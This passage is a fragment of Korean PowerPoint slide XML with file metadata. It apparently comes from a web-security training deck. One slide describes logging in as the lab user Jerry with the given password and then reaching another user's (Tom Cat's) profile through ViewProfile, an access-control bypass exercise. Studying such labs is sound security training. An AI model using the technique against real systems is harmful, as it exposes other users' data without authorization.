              <a:t>웃 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>한뒤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문제에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>주어진 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Jerry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>의 비밀번호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>jerry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jerry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>의 아이디로 접속한 뒤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>, Tom Cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>의 정보를 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 통해 접근하면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1" y="1674365"/>
            <a:ext cx="4562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0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3211</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>화면 슬라이드 쇼(4:3)</PresentationFormat>
  <Paragraphs>617</Paragraphs>
  <Slides>73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하현수</dc:creator>
  <cp:lastModifiedBy>하현수</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-09-24T14:57:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-25T09:36:55Z</dcterms:modified>
</cp:coreProperties>
</file>